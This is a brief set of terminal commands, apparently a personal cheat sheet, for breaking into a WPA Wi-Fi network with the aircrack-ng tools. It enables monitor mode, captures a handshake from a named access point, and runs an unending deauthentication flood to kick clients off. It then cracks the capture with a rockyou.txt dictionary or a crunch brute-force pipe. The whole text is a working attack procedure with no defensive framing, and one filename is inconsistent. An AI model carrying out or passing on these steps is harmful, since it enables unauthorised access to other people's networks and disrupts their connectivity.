First Terminal
iwconfig                               
airmon-ng check           
airmon-ng check kill
airmon-ng start wlan0 
airodump-ng wlan0 -d B8:1B:69:5F:20:8A
airodump-ng -w hack1 -c 11 --bssid B8:1B:69:5F:20:8A wlan0  

after crack hack1-01.cap file by dictionery attack
aircrack-ng hack1-01.cap -w rockyou.txt 

after crack hack1-01.cap file by brute force attack
crunch 6 12 abcd123456789 | aircrack-ng hack-01.cap -b B8:1B:69:5F:20:8A -w-

Second Terminal 
aireplay-ng --deauth 0 -a B8:1B:69:5F:20:8A wlan0 


